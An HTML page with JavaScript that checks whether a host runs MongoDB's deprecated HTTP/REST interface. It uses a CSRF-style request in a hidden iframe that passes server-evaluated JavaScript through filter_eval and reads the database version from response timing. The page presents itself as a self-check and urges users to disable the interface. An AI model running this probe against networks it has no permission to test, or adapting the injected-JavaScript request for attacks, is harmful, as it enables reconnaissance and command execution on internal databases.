<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>MongoDB REST API timing attack</title>
</head>
<body>
<div>
<h1>MongoDB REST API timing attack</h1>
<p>Test whether MongoDB's HTTP/REST interface (port 28017, enabled with <code>--rest</code>) is exploitable through CSRF on your localhost or on a host in your internal network. Because that interface evaluates JavaScript passed in a plain GET request (<code>filter_eval</code>), any web page you visit can make your browser issue database commands to it; this page only measures the response time, but an attacker is not limited to that. This poses a security risk and you should disable the interface (it was deprecated in MongoDB 3.2 and removed in 3.6). Note that the check is purely timing-based: a host that silently drops the connection can also exceed the threshold and be reported as a possible match.</p>
<label for="ip">To check IP</label> <input value="127.0.0.1" id="ip"> <label for="version">for version</label>
<select id="version">
<option value="2">2</option>
<option value="3">3</option>
</select>
click on <button type="button" onclick="check()">check</button>
</div>
<script>
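/* Delay (ms) the server-side function sleeps when the major version matches.
   The load is classified as a hit when it takes longer than this. */
var SLEEP_MS = 2000;

/* Port of mongod's legacy HTTP interface (the one enabled with --rest). */
var MONGO_HTTP_PORT = 28017;

/**
 * Build the probe URL for the MongoDB HTTP interface.
 *
 * The filter_eval parameter is evaluated on the server. The function only
 * sleeps when db.version() starts with the requested digit, so a response
 * the page cannot read (cross-origin) still leaks one bit through timing.
 *
 * @param {string} targetIp  host to probe; copied verbatim into the URL
 * @param {string} major     expected first character of db.version()
 * @param {number} sleepMs   delay the server-side function should introduce
 * @returns {string} absolute http:// URL
 */
function buildProbeUrl(targetIp, major, sleepMs) {
  return 'http://' + targetIp + ':' + MONGO_HTTP_PORT +
    '/admin/$cmd/?filter_eval=function(){if(db.version().charAt(0)==' +
    major + '){sleep(' + sleepMs + ')}}&limit=1';
}

/**
 * Click handler for the "check" button.
 *
 * Probes the configured host for a MongoDB HTTP interface of the selected
 * major version and reports the result with alert(). The request is sent by
 * navigating a hidden iframe, i.e. exactly the way a CSRF page would send
 * it; nothing of the response is readable, only how long the load took.
 *
 * Caveat: the oracle is purely timing-based. A host that is unreachable or
 * drops packets can take longer than SLEEP_MS to fail and will then be
 * reported as a possible match.
 *
 * Side effects: appends an iframe (removed again once it has loaded), writes
 * to console, and calls alert() when the frame's load event fires.
 */
function check() {
  var targetIp = document.getElementById('ip').value.trim();
  var major = document.getElementById('version').value;
  console.log(targetIp);

  // An empty host would produce "http://:28017/..." — refuse rather than probe it.
  if (targetIp === '') {
    alert('Please enter an IP address or host name to check.');
    return;
  }

  var frame = document.createElement('iframe');
  frame.style.visibility = 'hidden';
  // The response is untrusted content from another origin; keep it inert
  // (no scripts, no top-level navigation). Loading is unaffected.
  frame.setAttribute('sandbox', '');
  frame.title = 'MongoDB REST probe';
  document.body.appendChild(frame);

  var started; // set immediately before the navigation is started
  frame.onload = function () {
    var elapsed = Date.now() - started;
    console.log(elapsed);

    // One frame per probe: remove it so repeated clicks do not pile up iframes.
    frame.onload = null;
    document.body.removeChild(frame);

    if (elapsed > SLEEP_MS) {
      alert('Possible match.\nThere might be mongodb ' + major + '.x on IP ' + targetIp + '\nPlease consider to deactivate it as database commands can be issued even if it\'s just a testing environment.');
    } else {
      alert('There is either no mongodb running on ' + targetIp + ',\nit wasn\'t started with --rest,\na different port is used\nor another problem occured');
    }
  };

  var url = buildProbeUrl(targetIp, major, SLEEP_MS);
  console.log(url);
  // Start the clock right before the request so DOM work is not measured.
  started = Date.now();
  frame.src = url;
}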
</script>
</body>
</html>